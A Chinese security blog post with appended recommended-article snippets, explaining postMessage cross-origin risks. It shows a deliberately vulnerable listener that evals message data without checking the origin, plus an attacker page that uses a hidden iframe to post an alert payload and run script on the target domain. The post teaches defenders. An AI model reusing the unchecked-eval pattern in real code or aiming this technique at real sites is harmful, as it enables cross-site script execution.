postMessage安全性问题

最新推荐文章于 2024-07-30 17:41:38 发布
最新推荐文章于 2024-07-30 17:41:38 发布
阅读量7.6k 收藏 1
点赞数
分类专栏: web渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011721501/article/details/48877191
版权

0x00

浏览器有同源策略,规定js访问必须遵循同源策略,即满足同协议-同域名-同端口条件才能访问web资源,cookie,dom等等。
跨域的方式也有很多种,jsonp,window.name,document.cookie,其中postMessage就是一种跨域的方法。
使用postMessage方法时,我们只要发送端拥有某个窗口的有效js的句柄,就可以通过这套机制向该窗口发送任意长度的文本信息。
场景:
pay.example.com根目录下有个页面想获取用户的登录信息,为了达到这个目的,pay.example.com的根路径下有个页面加载了一个指向login.example.com的子框架。
1、这个子框架只需要发出以下指令:

parent.postMessage("user=bob", "https://pay.example.com");

2、在pay.example.com中获取这个message:

//对传进来需要处理的消息先进行注册
addEventListener("message", user_info, false) ;
//收到实际数据时的具体处理
function user_info(msg){
    if(msg.origin == "https://login.example.com"){
        //根据计划使用msg.data数据
    }
}

从上面的代码可以看出,使用postMessage时,必须要判断消息的来源,使用回调参数中的origin属性进行判断,从而限制不可信域请求我们的资源。但是有时候由于疏忽,会漏掉判断,这就会导致安全问题。

0x01

看一段代码:

The secret is random and different for each visitor.<br/>
<br />
Xss It! 
<script>
    var secret = Math.random();
    var data=localStorage.getItem("secret");
    if(!data){
        data=secret;
        localStorage.setItem("secret",data)
    }
    data=data+"";
    console.log("secret is :"+ data);
    window.addEventListener("message",function(e){
        var d=e.data;
        if(!d || !d.secret){return;}
        var token=d.secret;
        var action=d.action;
        switch(action){
            case "check":
                if(data.match(new RegExp(token))){
                    console.log("ok");
                }
                break;
            case "run":
                if(token === data){
                    eval(d.cmd);
                }
                break;
            default:
                void 0;
        }
    })
</script>

页面通过addEventListenr方法捕捉一个message事件,但是没有判断请求的来源就进行eval操作,这就会导致任意域在本域执行JS代码。写个页面即可,先获取窗口句柄,再发送恶意数据即可。
代码如下:

<!DOCTYPE html>
<html>
<body>
postMessage for xss test
<script>
var f = document.createElement('iframe') ;
f.style = "display:none;" ;
f.width = "0" ;
f.height = '0' ;
f.name = "poor" ;
f.src = "http://xxoo.sinaapp.com/test/test.htm" ;
document.body.appendChild(f) ;
f.onload = function(){
    var w = f.contentWindow ;
    w.postMessage({secret:"0.8192312608007342",action:'run',cmd:'alert(location.href)'},"http://xxoo.sinaapp.com/test/test.htm") ;
}
</script>
</body>
</html>

通过这种方式可以在xxoo.sinaapp.com域上执行任意js代码,突破同源限制。所以,以后使用postMessage跨域,应该做好一定的防范和验证。

隐形人真忙
关注
专栏目录
详解html5 postMessage解决跨域通信的问题
09-22
HTML5的`postMessage` API是为了解决Web应用程序中的跨域通信问题而设计的。在Web开发中,由于浏览器的安全策略,不同源的页面不能直接共享或交换数据,这被称为同源策略。然而,有时候我们需要在不同源的页面之间...
js中窗口的postMessage方法1
08-08
3. 使用 window.postMessage() 方法时,需要注意消息的安全性,防止密码被恶意的第三方截获。 window.postMessage() 方法是 JavaScript 中的一种跨源通信机制,允许两个不同页面的脚本之间进行通信。使用时需要注意...
html5post安全性,html5新机制:postMessage实现安全跨域通信(代码)
weixin_35023786的博客
06-16 443
本篇文章给大家带来的内容是关于html5新机制:postMessage实现安全跨域通信(代码),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。效果图postmessage解析HTML5提供了新型机制PostMessage实现安全的跨源通信. 语法otherWindow.postMessage(message, targetOrigin, [transfer]);otherWin...
造成postMessage跨域漏洞的可能的问题
weixin_50464560的博客
08-14 836
前言 postMessage是HTML5衍生出来的,用来规范跨域的问题。但由于使用者不注意一些安全性,可能会产生一些漏洞,这篇文章介绍可能产生的问题。 如何工作 为了跨域去发送一些数据,应用会用如下的语句去发送 targetWindow.postMessage(data, "*"); data为数据,*为接收端 为了去接受一些数据,接收端会添加一个事件监听器用来接受跨域传输过来的数据 window.addEventListener("message", function(message){console.l
window.postMessage 支持回调函数
阿东的博客
07-30 189
widow.postMessage如何支持回调?
PostMessage跨域漏洞
yggcwhat
06-05 1328
PostMessage跨域漏洞
详解使用postMessage解决iframe跨域通信问题
12-13
【跨域通信问题postMessage】 在Web开发中,跨域通信是一个常见的挑战,由于浏览器的同源策略限制,不同源的页面之间不能直接共享数据或触发交互。然而,有时候我们需要在一个页面(如主页面)中嵌入另一个页面...
详解HTML5 window.postMessage与跨域
09-27
在实现跨域通信时,需要注意安全性问题。使用postMessage时,源窗口和目标窗口必须都明确同意通信的发生,否则即使消息发送过去也无法被接收。此外,目标窗口的事件监听函数中应该对消息进行校验,确保消息是由预期...
HTML5中的postMessage API基本使用教程
09-28
HTML5的`postMessage` API是一种允许...`postMessage` API是现代Web开发中解决跨域通信的重要工具,其灵活性和安全性使其在各种场景中都得到了广泛应用。了解和掌握这一技术,对提升Web应用的交互性和安全性大有裨益。
乌云大会总结的PostMessage系统漏洞及应对方案
weixin_50464560的博客
08-13 409
浅析 postMessage 方法介绍、如何接收数据(监听message事件及其属性介绍)、使用postMessage安全注意事项、具体使用方式(父子页面如何互发消息、接收消息)
热门推荐
cmhahaha的博客
04-29 2万+
postMessage 是 html5 引入的API,postMessage()方法允许来自不同源的脚本采用异步方式进行有效的通信,可以实现跨文本文档、多窗口、跨域消息传递,多用于窗口间数据通信,这也使它成为跨域通信的一种有效的解决方案。 一、Window postMessage() 方法介绍 postMessage() 方法用于安全地实现跨源通信。(只有同源脚本才能相互通信,window.postMessage() 方法提供了一种受控机制来规避此限制,只要正确的使用,这种方法就很安全。) 1、语法:o
安全与协议】使用 iframe + postMessage 实现跨域通信
Umbrella_Um的博客
06-23 844
在实际项目开发中可能会碰到在 a.com 页面中嵌套 b.com 页面,这时第一反应是使用 iframe,但是产品又提出在 a.com 中操作,b.com 中进行显示,或者相反。 1、postMessage postMessage方法允许来自不同源的脚本采用异步方式进行有限的通信,可以实现跨文本档、多窗口、跨域消息传递。 语法: otherWindow.postMessage(message, targetOrigin, [transfer]) otherWindow:其他窗口的引用,如 iframe的
你了解postMessage吗?
yz的博客
06-29 592
前言: 通常,对于两个不同页面的脚本,只有当执行它们的页面位于同源(同协议、同主机、同端口)情况下,这两个脚本才能相互通信。window.postMessage()方法可以安全地实现跨域通信(前提:正确使用)。 使用: 语法: otherWindow.postMessage(message, targeOrigin, [opt]); 字段解释: (1)otherWindow:其他窗口的一个引用,比如执行window.open返回的窗口对象; (2)message:将要发送到其他window的消息,它将被结
HTML5跨域消息发送安全性分析
weixin_34004576的博客
03-17 340
HTML5是下一代的Web应用,它具有许多新的特性,是一种新兴的技术并且在移动应用中也有着广泛的使用。但也正是因为它的一些新特性的出现以及广泛的应用,使得其安全性非常值得关注。 在本文中,我们将针对HTML5 Web消息发送(跨域消息发送)的安全性进行分析和研究。 跨域消息发送 在讨论这一问题之前,我们先来了解下在HTML5中是...
win7下万能跨进程PostMessage/SendMessage
weixin_30376163的博客
06-16 419
typedef BOOL (WINAPI *_ChangeWindowMessageFilter)( UINT , DWORD); BOOL AllowMeesageForWin7(UINT uMessageID, BOOL bAllow)//注册Win7全局消息 { BOOL bResult = FALSE; HMODULE hUserMod = NULL...
前端使用iframe和postMessage模拟银行证书USB卡的情况
qq_42750608的博客
10-29 155
最核心代码: 现在随便起名abc.js: let f2 = null; let f1 = null; function postMsgToParentPage(fn) { f2 = (event, fn) => { console.log(event); try { event = JSON.parse(event.data) document.getElementById('message').innerH
h5 postMessage 注意事项
baidu_37598818的博客
02-21 1847
1,第二个参数不是明确的网页地址 2,postmessage事件一定是window.iframes[n]下发出的 3,事件一定要绑定在iframe框架onload加载上面才有用。
html5跨域通信之postMessage
小平果的欢乐谷
05-27 3646
html5跨域通信之postMessage的用法不同域名下的文档因为安全问题,不允许相互之间文档的访问,但是有的时候却不得不需要这样的操作。因此我们一般可以采用 window.name,hash,或者jsonp来实现跨域访问。不过自从html5出来以后,我们又可以多一种实现方式了postMessage,下面就是一个最简单的消息传递的例子,我们要实现的功能是将page1页面中的内容,发送到不同域名下的
POSTMessage
最新发布
09-10
`postMessage()` 是一种在浏览器中用于跨源通信的技术,它允许不同源的网页间传递消息。这是通过JavaScript的`window.postMessage()`方法实现的,尤其常用于如框架间的通信(例如React Native中的App与H5页面),或者在拥有安全同源策略限制的场景下,如跨iframe通信[^1]。 **示例1: 跨iframe通信** ```javascript // 主页面 (父页面) let iframe = document.getElementById('childIframe'); iframe.contentWindow.postMessage('Hello from parent', '*'); // 如果rame内的页面 (子页面) window.addEventListener('message', function(event) { if (event.origin !== 'http://parent.com') return; // 检查来源 console.log('Received message:', event.data); }, false); ``` **示例2: 微信小程序Webview与H5通信** 在微信小程序中,虽然Webview组件不能直接使用`postMessage()`,但可以通过设置`onLoad`事件监听器来间接实现数据交换[^2]。首先在H5页面中发送消息: ```javascript window.parent.postMessage('Hello from H5', '*'); ``` 然后在小程序的Webview上接收并处理消息: ```javascript wx.createSelectorQuery() .select('#webviewId') .fields({ node: true, }) .exec((res) => { const webView = res[0].node; webView.addEventListener('load', () => { webView.onmessage = function(e) { console.log('Received message in WeChat:', e.data); }; }); }); ``` 请注意,实际使用时需要确保安全性和权限设置正确。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值